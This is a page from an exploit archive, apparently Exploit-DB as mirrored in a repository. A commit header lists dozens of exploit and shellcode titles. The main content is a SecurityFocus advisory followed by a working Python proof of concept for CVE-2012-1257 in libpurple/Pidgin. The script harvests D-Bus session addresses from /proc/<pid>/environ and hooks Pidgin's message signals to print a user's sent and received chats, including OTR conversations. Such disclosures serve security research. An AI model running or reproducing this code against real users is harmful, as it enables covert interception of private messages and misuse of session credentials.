880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
97 lines
No EOL
2.8 KiB
Python
Executable file
97 lines
No EOL
2.8 KiB
Python
Executable file
source: https://www.securityfocus.com/bid/52175/info
|
|
|
|
libpurple is prone to an information-disclosure vulnerability.
|
|
|
|
Successful exploits may allow attackers to obtain potentially sensitive information that may aid in other attacks.
|
|
|
|
The following products are vulnerable:
|
|
|
|
libpurple versions prior to 2.10.1
|
|
pidgin versions prior to 2.10.1
|
|
pidgin-otr versions prior to 3.2.0
|
|
|
|
#!/usr/bin/env python
|
|
# PoC for snooping on pidgin discussions (OTR/non-OTR) via dbus
|
|
# (see CVE-2012-1257)
|
|
#
|
|
# requires python-dbus and python-gobject
|
|
#
|
|
# based on sample code found here:
|
|
# http://developer.pidgin.im/wiki/DbusHowto
|
|
#
|
|
# Disclaimer: There's virtually no error handling here,
|
|
# so don't rely on this for any serious work.
|
|
#
|
|
# Author:
|
|
# Dimitris Glynos :: { dimitris at census dash labs dot com }
|
|
|
|
import dbus, gobject, os, sys
|
|
from dbus.mainloop.glib import DBusGMainLoop
|
|
|
|
# same owner processes get to snoop their respective DBUS credentials
|
|
# via /proc/<pid>/environ
|
|
|
|
def obtain_dbus_session_creds():
|
|
all_pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]
|
|
env_tmpl = '/proc/%s/environ'
|
|
session_creds = {}
|
|
|
|
for pid in all_pids:
|
|
if not (os.stat(env_tmpl % pid).st_uid == os.getuid()):
|
|
continue
|
|
if not os.access(env_tmpl % pid, os.R_OK):
|
|
continue
|
|
|
|
f = open(env_tmpl % pid, 'rb')
|
|
contents = f.read()
|
|
f.close()
|
|
for var in contents.split('\0'):
|
|
if var.startswith('DBUS_SESSION_BUS_ADDRESS='):
|
|
val = var[var.index('=')+1:]
|
|
if not session_creds.has_key(val):
|
|
session_creds[val] = 1
|
|
return session_creds
|
|
|
|
def recvs(account, contact, msg, conversation, flags):
|
|
print "received '%s' from %s" % (msg, contact)
|
|
|
|
def sends(account, contact, msg, conversation, flags):
|
|
if flags == 1:
|
|
print "sent '%s' to %s" % (msg, contact)
|
|
|
|
if not os.environ.has_key('DBUS_SESSION_BUS_ADDRESS'):
|
|
creds = obtain_dbus_session_creds()
|
|
|
|
if len(creds.keys()) == 0:
|
|
print >> sys.stderr, ( "error: no dbus session " +
|
|
"credentials could be recovered." )
|
|
sys.exit(1)
|
|
|
|
if len(creds.keys()) > 1:
|
|
print >> sys.stderr, ( "error: multiple dbus session " +
|
|
"credentials found!\nPlease rerun with the proper "+
|
|
"DBUS_SESSION_BUS_ADDRESS env variable\n" +
|
|
"Here are the recovered credentials:\n")
|
|
for k in creds.keys():
|
|
print >> sys.stderr, "DBUS_SESSION_BUS_ADDRESS=%s" % k
|
|
sys.exit(1)
|
|
|
|
os.environ["DBUS_SESSION_BUS_ADDRESS"] = creds.keys()[0]
|
|
|
|
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
|
|
bus = dbus.SessionBus()
|
|
|
|
bus.add_signal_receiver(
|
|
recvs,
|
|
dbus_interface="im.pidgin.purple.PurpleInterface",
|
|
signal_name="ReceivedImMsg"
|
|
)
|
|
|
|
bus.add_signal_receiver(
|
|
sends,
|
|
dbus_interface="im.pidgin.purple.PurpleInterface",
|
|
signal_name="WroteImMsg"
|
|
)
|
|
|
|
mainloop = gobject.MainLoop()
|
|
mainloop.run() |